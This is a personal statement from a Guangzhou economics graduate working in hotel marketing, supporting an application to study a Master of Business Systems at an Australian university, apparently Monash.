The statement is being submitted in support of my application in your approval for studying in xxx University in Australia. Previous Education:
I was born in Guangzhou, a southern city in China that has long been known for the prosperity of its economic development. With high scores in the National University Entrance Examination in 1995, I was admitted to the xxx university where has a good reputation for its business and economic courses in South China. Facing the era of reform and opening-up, I did not hesitate to choose economics as my Bachelor Courses.
Four years of undergraduate study proved to be fruitful. I devoted my studies to commercial English courses, finances and international business. Through my hard working with a wish to build a solid foundation for my development, I passed the National College English Test Band 6 in 1997 and the National Computer Application Test Band 2 in 1998. More over I was awarded with the scholarships annually due to my outstanding studies.
On the other hand, unlike many other Chinese undergraduate students who tend to confine themselves to the campus, I try to get rich and colorful working experience. In the last two years in my college life, I served during the Guangdong Import & Export Trade Fairs as an interpreter and assistant. In these activities, I have gained some practical experience.
In 1999, I finished my graduation thesis “The Chances And Challenges Of Foreign Investment In China” on the basis of the data that I gathered from visits to the relative associations and some China’s famous joint ventures, such as P & G Company, Honda Mobile Company. This thesis was graded A by my BA supervisor. Work Experience:
Since my graduation in 1999, I have worked as a marking investigator in xxxx. I showed my enthusiasm to this job under the reason that it could improve my independent research ability and the problem solution capacity. I was with responsibilities over business information and local market situation investigations. I did several market research projects when the company was in the constructive period. For instance, the reports such as XXX XXX,XXX gave out many important data and information to fix on hotel’s design and facilities. My boss praised my particular survey and innovative opinions highly. Further more some suggestions in these reports were good reference to company's market strategy.
Because of my excellent performance, I obtained the position on the vice-manager in Marketing Department in my second year in the XXX, responsible for sales and promotion of hotel products and services. Also, I built up the good relationship with some joint ventures and foreign capital companies in Guangzhou as they are hotel’s main customer resource.
However, information management problem in my work is beyond my competence to solve. I have always felt a headache when I faced to a large number of information which from changeable market and client records. I understand that our market expectation and strategy application are all depended on the precise market research results, otherwise, they will influence hotel’s service quality even the competitive status. But how to design, maintain and make information resources and services available to meet an ever expanding range of needs are the biggest difficulties to me. It’s a new subject that I should get the further study. Purpose of Study
Although the job is satisfying in terms actually of both remuneration and prestige, I think my undergraduate degree and work experience do not provide me enough room for my professional work and career development. 21 century is the information epoch, so not only hotel but also any other businesses need all aspects of advanced commercial information systems and technology. Struggling hard as we are in this country to keep abreast of the world's latest developments in information technology, our economic growths in the last two decades have greatly expanded the market for information services. All this calls for the exactly kind of expertise I hope to acquire by studying in your country. On the other hand, both of the membership of the WTO in the end of this year and the host country of 2008 Olympics will keep China going on its modernization. Undoubtedly China will play a vital role in the international economic system in the future. That means it needs more professionals in its economic development and it will give chances and challenges to young people who seek to the better achievements in the future.
Since Information technology is a challenging area of studies that blends other disciplines, I believe that my hard undergraduate study in the Economics at Guangdong University of Foreign Studies has encouraged me intellectually to pursue this advanced academic study in Australia. My successful English courses not only provide a quick adjustment to my future studies abroad, but also give me a new perspective into the cultural and social characteristics of information technology. Also, the Monash University presents itself as the ideal place for my goal. It not only highlights such a specialization on information technology in business administration, but also demonstrates its overall strength in many aspects of business studies. I have confidence that the further education at Monash University will facilitate my comprehensive training in the field of information technology and promote me to the forefront of the information business in China.
According to the above reasons, I wish to pursue my Master of Business System degree in Australia. Your favorable evaluation of my application will be highly appreciated.
